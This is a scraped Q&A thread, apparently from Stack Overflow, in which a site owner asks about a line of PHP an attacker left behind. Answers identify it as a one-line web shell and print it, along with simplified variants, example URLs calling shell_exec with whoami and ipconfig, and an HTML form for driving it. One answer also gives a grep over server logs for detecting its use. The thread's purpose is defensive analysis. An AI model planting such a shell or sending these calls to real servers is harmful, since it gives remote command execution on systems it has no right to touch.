Login/Register
Found codes left by hacker but don't understand what it does
Asked Answered
Solved phpsecuritydeobfuscationcracking
H

3

9

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

Hatband answered 29/10, 2013 at 15:45 Comment(5)
errors are suppressed..?Gustav
This is used to call PHP functions with a simple URL. Must be removed as soon as possible.Carpathoukraine
It's a PHP shell. If you rewrite it to <?=($_=@$_GET[2]).@$_($_GET[1])?> the URL file.php?1=shell_exec&2=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GETSusquehanna
In general, it's not worth asking what hacked code does; it's usually obfuscated, and always does something nasty. First thing to do is remove it; restore your backups and make sure you've installed all available security patches for any third-party software you use. If you want to more spend time on it, spend that time working out how to avoid getting hacked again, rather than what the hack actually does.Inositol
@Inositol actually it can be incredibly helpful to figure out what the code does. If you're being hacked by a script kiddie, you can pwn the pwnr. It's also incredibly useful to know what the code does so that you can mitigate the damage done by the attack. In this case we know that the attacker was executing shell commands... he could have escalated to uid=0.Awry
D
8

As Reeno already said in a comment, it's like a PHP shell.

Explanation

  • Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

    $_=@$_GET[2]

  • Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

    @$_($_POST[1])

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

Discreditable answered 29/10, 2013 at 16:27 Comment(0)
S
10

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Susquehanna answered 29/10, 2013 at 16:26 Comment(0)
D
8

As Reeno already said in a comment, it's like a PHP shell.

Explanation

  • Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

    $_=@$_GET[2]

  • Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

    @$_($_POST[1])

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

Discreditable answered 29/10, 2013 at 16:27 Comment(0)
C
6

First of all, you must remove those lines as soon as possible.

This code is used to call PHP functions. To give you an example, your hacker will use this kind of form :

<form method="post" action="http://site.com/page.php?2=shell_exec">
    <input name="1" value="ipconfig -all"/>
    <input type="submit" value="Send"/>
</form>

You'll then get this values :

  • $_ = $_GET[2] = shell_exec
  • $_POST[1] = ipconfig -all
  • $_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")

@ are here to disable errors.

A simpler example would be to use this code :

<?= @$_GET['c'](@$_GET['p']); ?>

With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .

Carpathoukraine answered 29/10, 2013 at 16:34 Comment(1)
It uses get parameters, not post.Rattly

© 2022 - 2025 — McMap. All rights reserved.